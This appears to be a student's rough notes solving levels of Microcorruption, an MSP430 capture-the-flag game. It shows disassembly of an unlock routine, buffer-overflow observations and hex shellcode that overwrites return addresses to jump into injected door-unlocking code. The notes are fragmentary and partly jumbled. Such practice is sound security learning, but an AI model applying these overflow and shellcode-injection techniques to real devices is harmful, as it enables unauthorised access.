welcome to

Microcorruption.com solutions








main calls enc

b 4486
b 449c 
b 44d6
b 4510

when enc returns, main calls #0x2400 which does not appear in the code text

2400 0b12           push r11
2402 0412           push r4
2404 0441           mov sp, r4
2406 2452           add #0x4, r4
2408 3150 e0ff      add #0xffe0, sp
240c 3b40 2045      mov #0x4520, r11
2410 073c           jmp $+0x10
2412 1b53           inc r11
2414 8f11           sxt r15
2416 0f12           push r15
2418 0312           push #0x0
241a b012 6424      call #0x2464
241e 2152           add #0x4, sp
2420 6f4b           mov.b @r11, r15
2422 4f93           tst.b r15
2424 f623           jnz $-0x12

2430 2152           add #0x4, sp
2432 3012 1f00      push #0x1f
2436 3f40 dcff      mov #0xffdc, r15
243a 0f54           add r4, r15
243c 0f12           push r15
243e 2312           push #0x2
2440 b012 6424      call #0x2464
2444 3150 0600      add #0x6, sp
2448 b490 1e31 dcff cmp #0x311e, -0x24(r4)
244e 0520           jnz $+0xc
2450 3012           push #0x7f
2454 b012 6424      call #0x2464

245a 3150 2000      add #0x20, sp
245e 3441           pop r4
2460 3b41           pop r11
2462 3041           ret

2464 1e41 0200      mov 0x2(sp), r14
2468 0212           push sr
246a 0f4e           mov r14, r15
246c 8f10           swpb r15
246e 024f           mov r15, sr
2470 32d0 0080      bis #0x8000, sr
2474 b012 1000      call #0x10
2478 3241           pop sr
247a 3041           ret


ffff ffff ffff ffff ffff ffff ffff ffff ffff [instructions begin here]

We want to write a "jump to" to unlock the door.

After we are initially rejected, we will force the lock to jump to our inserted instructions.

023c   jmp #0x4526
ffff ffff ffff ffff ffff ffff ffff ffff [address goes here]

Our password gets stored at 307e. So now we start writing instructions one byte at a time.

0000 0000 0000 0000 0000 0000 0000 0000 307e
3012 7f00 b012 3245 0000 0000 0000 0000 0000 307e

3e40 007f 0f4e 024f 32d0 0080 b012 1000 7e30


Right away, they state to enter a pw of 8-16 chars so I enter 17 'A's. This leads to an instruction unaligned meaning there is an overflow so possible code exploit again.

The password is stored at 2400.

First out of alignment instruction will be at 2410.

0000 0000 0000 0000 0000 0000 0000 0000 

There is a string copy that happens where the password entered is copied into address 43ee.

The overflow occurs during the password copy.

Code that would normally have been returned to gets overwritten.

We can exploit this based on what returns to that point.

That address is 43fe.

The stack pointer 43ee gets moved into r15 then conditional_unlock_door gets called.

After that function runs, r15 will be tested like in the previous problem.

login is what returns and causes the bad address to get set.

0000 0000 0000 0000 0000 0000 0000 0000 

yyxx is the address that we want to return to.

More likely than not, we will provide 43ee aka ee43.